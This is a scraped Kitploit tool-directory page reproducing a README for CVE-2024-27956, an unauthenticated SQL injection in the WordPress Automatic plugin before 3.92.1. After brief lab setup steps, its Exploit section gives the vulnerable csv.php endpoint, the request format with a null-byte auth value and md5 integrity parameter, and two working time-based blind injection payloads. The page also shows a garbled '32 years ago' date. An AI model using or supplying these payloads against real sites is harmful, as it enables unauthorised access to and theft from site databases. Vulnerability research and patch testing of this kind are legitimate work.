Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-27956 — CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection | Kitploit
Tools/GitHubGitHub/truonghuuphuc/cve-2024-27956
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubtruonghuuphuc/cve-2024-27956

CVE-2024-27956

CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection

View Repository
32 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-27956

Note

Build wordpress: docker-compose -f stack.yml up

Install plugin:

  1. WordPress dashboard, choose Plugins > Add New

  2. Click Upload Plugin

image

  1. Choose File -> wp-automatic.zip -> Install Now

image

  1. After the installation is complete, click Activate Plugin

image

Exploit

<HOST>/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

root@kitploit:~
q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

image

root@kitploit:~
q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183

image

Download Tool